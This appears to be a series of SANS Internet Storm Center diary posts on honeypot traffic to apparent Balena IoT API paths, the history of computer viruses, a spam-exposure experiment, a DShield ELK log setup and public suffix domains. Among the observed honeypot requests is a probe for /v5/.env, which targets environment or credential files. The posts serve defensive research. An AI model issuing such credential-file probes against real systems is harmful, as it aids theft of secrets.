Yesterday, I noticed a new URL in our honeypots: /v5/device/heartbeat. But I have no idea what this URL may be associated with. Based on some googling, I came across Balena, a platform to manage IoT devices [1]. Does anybody have any experience with this software and know what an attacker would attempt to gain from the URL above? Maybe just fingerprinting devices? I do not see recent vulnerabilities anywhere, but there is a good chance that vulnerable components are being used by the software.

All requests originate from a single IP address. This IP address shows no other activity in our honeypot and appears to be a Canadian consumer IP address.

Looking back in our data, there are a couple of other URLs that may be related, for example, /v5/search, /v5/.env, and variations of /v5/search/???????/place/[integer number].

Balena (or Open Balena) offers an API to manage fleets of IoT devices. A system like this, managing many IoT devices, would certainly be an attractive target. Balena also distributes an "Etcher" tool that is often recommended to create bootable USB sticks from ISO files to install operating systems on devices. But the Etcher tool is a desktop application without network access, and unrelated to the IoT management API.

[1] https://docs.balena.io/reference/api/overview/

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu


Published: 2024-02-06

Computer viruses are celebrating their 40th birthday (well, 54th, really)

Although "cyber security" is a relatively new field, it already has quite an interesting history, and it is worthwhile to look back at it from time to time. One historical event, which took place in February of the Orwellian year 1984, and which – therefore – celebrates its 40th anniversary this month, was the publication of Fred Cohen's paper entitled "Computer Viruses: Theory and Experiments"[1], which is often cited as the origin of the term "computer virus".

While this is not strictly correct – probably the first recorded use of the word "virus" for a malicious computer program goes all the way back to 1970, when Gregory Benford's short story "The Scarred Man" was published in the May issue of Venture magazine[2,3], and Cohen himself had done earlier work on the subject – it is true that Cohen's article was almost certainly the first published academic work in which the term was at least somewhat formally defined, and in which (pseudo)code of a virus was actually included[4].

Cohen defined "virus" as "a program that can 'infect' other programs by modifying them to include a possibly evolved copy of itself", and demonstrated potential function of such a program with the following pseudocode.

Although the term "computer virus" is still commonly (and quite incorrectly, as we may see from the definition mentioned above) used to refer to any malicious code, real computer viruses are mostly a thing of the past. Probably the last actual virus, which managed to spread in the wild, was KBOT, which was analyzed by Kaspersky in February of 2020[5].

So, it seems, that this month, we may celebrate not just the (somewhat disputable) 40th birthday of computer viruses, but also the 4th anniversary of the last of their kind making any real impact on the world.

[1] https://www.sciencedirect.com/science/article/abs/pii/0167404887901222
[2] https://www.youtube.com/watch?v=GjY1KlmroOU&t=1295s
[3] https://web.archive.org/web/20120116080803/http://www.gregorybenford.com/extra/the-scarred-man-returns/
[4] http://all.net/books/virus/index.html
[5] https://securelist.com/kbot-sometimes-they-come-back/96157/

Jan Kopriva
Nettles Consulting


Published: 2024-02-05

Public Information and Email Spam

Many organizations publicly list contact information to help consumers reach out for help when needed. This may be general contact information or a full public directory of staff. It seems obvious that having any kind of publicly available information will increase the likelihood that these accounts will receive spam or phishing emails. To help understand a bit of this, I set up a brand new domain with a very basic website and collected email using Amazon SES [1] for a couple of weeks. The website contained email addresses in a variety of formats:

  • email@domain
  • email (at) domain
  • email@domain (hidden in HTML comments)
  • web form

The site was made live on 1/21/2024 and within a few hours started receiving scans. 

Email Address / Source          Number of Emails Received   Time to Receive 1st Email (Days)
Web Form                        4                           2
email@domain                    7                           5
email@domain (HTML comments)    1                           9
email (at) domain               0                           N/A

The time to receive an initial email was much longer than I expected. While scanning of the website happened within the first few hours of the website being publicly available, incoming emails took a couple of days. The web form was also the first method used to submit any content.

Common themes of the emails received included:

  • Website redesign
  • Android app development
  • Marketing /sales

Email Subjects:

  • FYI- Redesign your website ? 
  • What is the next for <domain>
  • Price List
  • Revealed: Hiring Freelancers Save You Time & Money in 2024
  • Re: Delayed Payment - 2024/1/30 8:00:00
  • Android App Development !! 
  • Re: Call to update your website $
  • your Sales Funnel...? 
  • _Re:_Pay_attention_to_Google=E2=80=99s_guidelines_-_SEO_settings
  • Re: Uncompleted Payment - 2024/1/30 5:25:28

Sending domains:

  • hotmail[.]com
  • nwjgc[.]biz
  • lcs.yqp.mybluehost[.]me
  • ssspay[.]com

At the time of this writing, there were no emails received for an address in this domain that was not listed on the website. There is definitely an impact on spam received when an email address is made publicly available. As more data is collected, more patterns may emerge from source domains and networks. 

Consider limiting the data accessible on public resources, including contact pages and forums, to help combat spam messaging.

[1] https://aws.amazon.com/ses/

Jesse La Grew


Published: 2024-02-03

DShield Sensor Log Collection with Elasticsearch

This is a fork of the original work by Scott Jensen [1][2], originally published here as a guest diary as part of the SANS.edu BACS program [7]. This update has a number of new features and is now available on GitHub [4].

The Docker Compose setup is custom built to be used with the DShield honeypot [3][6] to collect, store, and parse sensor logs, and to display the data in a visual way that makes it easy to search and analyze for research purposes. It assumes the DShield sensor is already installed on a Raspberry Pi running Raspbian OS, or on a system running Ubuntu 20.04 LTS, either on your network or in the cloud of your choice.

Suggested Setup of ELK Server Based on Ubuntu

  • Ubuntu 20.04 LTS Live Server 64-Bit
  • Minimum 8+ GB RAM
  • If the amount of RAM assigned to each container (see below) is more than 2GB, consider increasing the server RAM capacity.
  • 4-8 Cores
  • Minimum 40 GB partition assigned to /var/lib/docker

Setting Up Docker

The instructions to set up Docker and Elasticsearch are listed here [5].

The Docker package comes set up with the Fleet Server and the Elastic Agent pre-loaded, with 350+ integrations for collecting and analyzing data. These can be used to add threat intel to ELK, collect netflow data with softflowd, or ingest any other logs you want to send to ELK. Docker Compose is configured with the following components:

  • Kibana
  • Elasticsearch
  • Logstash
  • Elastic-Agent

Example of DShield Dashboard

Dashboard [Logs DShield Sensor] Overview

Traffic & Log Analysis

This section contains a direct link to CyberGordon, which will query multiple sites for the selected hashes. If ttylog DShield sensor logs are collected, they can be moved over to the ELK server for review.

Traffic Analysis, Location and Network Owner

This section contains direct links to CyberGordon, Censys & Shodan.

DShield sensor TTYLog Capture Activity

[1] https://isc.sans.edu/diary/DShield+Sensor+Monitoring+with+a+Docker+ELK+Stack+Guest+Diary/30118
[2] https://github.com/fkadriver/Dshield-ELK
[3] https://isc.sans.edu/tools/honeypot/
[4] https://github.com/bruneaug/DShield-SIEM/tree/main
[5] https://github.com/bruneaug/DShield-SIEM/blob/main/README.md#install-docker
[6] https://github.com/DShield-ISC/dshield
[7] https://www.sans.edu/cyber-security-programs/bachelors-degree/
Guy Bruneau IPSS Inc.
My Handler Page
Twitter: GuyBruneau
gbruneau at isc dot sans dot edu


Published: 2024-02-01

What is a "Top Level Domain"?

In yesterday's diary, I discussed a new proposed top-level domain, ".internal". This reminded me to talk a bit about what a top-level domain is all about, and some different ways to look at the definition of a top-level domain.

A quick trip to Google leads to the official definition of "top-level domain" in RFC 1591 [1]:

There are a set of what are called "top-level domain names" (TLDs).  These are the generic TLDs (EDU, COM, NET, ORG, GOV, MIL, and INT), and the two letter country codes from ISO-3166.  It is extremely unlikely that any other TLDs will be created.

That last sentence could have aged better. By my count, there are currently 1,452 different top-level domains [2]. But things are even a bit more complex as you start trying to figure out what a "domain" is all about.

There are some "domains" that behave more like top-level domains. For example, "co.uk" is used to assign entities domain names instead of "uk" (there are some legacy .uk domains left). This makes things more complex if you are trying to extract, for example, unique domain names from DNS logs. "co.uk" is likely not what you were looking for. This also affects cookies. Browsers will not allow you to set a cookie for a TLD name. And it would not make much sense to allow cookies for "co.uk", even though that is technically a "domain".

And HTTP cookies offer a path to a solution to the problem. From RFC 6265 [3]:

A "public suffix" is a domain that is controlled by a public registry, such as "com", "co.uk", and "pvt.k12.wy.us". This step is essential for preventing attacker.com from disrupting the integrity of example.com by setting a cookie with a Domain attribute of "com".  Unfortunately, the set of public suffixes (also known as "registry controlled domains") changes over time.  If feasible, user agents SHOULD use an up-to-date public suffix list, such as the one maintained by the Mozilla project at <http://publicsuffix.org/>.

If you are looking for unique domains, you should be looking for <domain>.<publicsuffix>.

For Python developers, there are luckily two different libraries to use the public suffix list from Mozilla: publicsuffix2 [4] and publicsuffixlist [5]. I prefer the second one, but I forgot why (I think it supports IDNs better).
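To make the idea concrete, here is a minimal, self-contained sketch of registrable-domain extraction against a tiny hard-coded suffix set. Real code should use one of the libraries above with the full, regularly updated list; the set below is only illustrative:

```python
# A tiny, hard-coded stand-in for the Mozilla Public Suffix List; the real list
# has thousands of entries and changes regularly.
PUBLIC_SUFFIXES = {"com", "co.uk", "pvt.k12.wy.us"}

def registrable_domain(hostname):
    """Return <domain>.<publicsuffix> for a hostname, or None if no suffix matches."""
    labels = hostname.lower().rstrip(".").split(".")
    # Walk from the longest candidate suffix to the shortest; the first match
    # is the longest matching public suffix. Keep exactly one label above it.
    for i in range(len(labels)):
        if i > 0 and ".".join(labels[i:]) in PUBLIC_SUFFIXES:
            return ".".join(labels[i - 1:])
    return None

print(registrable_domain("blog.example.co.uk"))  # example.co.uk
print(registrable_domain("www.example.com"))     # example.com
```

Note how "blog.example.co.uk" reduces to "example.co.uk", not "co.uk": that is exactly why counting "unique domains" in DNS logs needs the suffix list.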

So what are some of these "public suffixes"?

I counted a total of 9,568 different public suffixes. They include expected suffixes like:


But also some suffixes with more than three labels. For example:


Some use a wildcard for the third label:

The idea is that companies who offer subdomains for individual customers, for example, to host blogs or other content, can identify these "subdomains" as controlled by an independent entity. Or, as Mozilla defines it, "mutually untrusting parties."

As stated above, the list is maintained by Mozilla. Domain owners must request the addition of their domain to the list. The list is, of course, ever-changing. There are currently about a hundred outstanding pull requests, and based on the GitHub history, updates are made at least weekly. If you use the list: Make sure you keep it updated.

[1] https://datatracker.ietf.org/doc/html/rfc1591
[2] https://data.iana.org/TLD/tlds-alpha-by-domain.txt
[3] https://datatracker.ietf.org/doc/html/rfc6265#section-5.3
[4] https://pypi.org/project/publicsuffix2/
[5] https://pypi.org/project/publicsuffixlist/

[Image: quote from RFC 1591 saying that it is extremely unlikely that new TLDs will be created]

Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu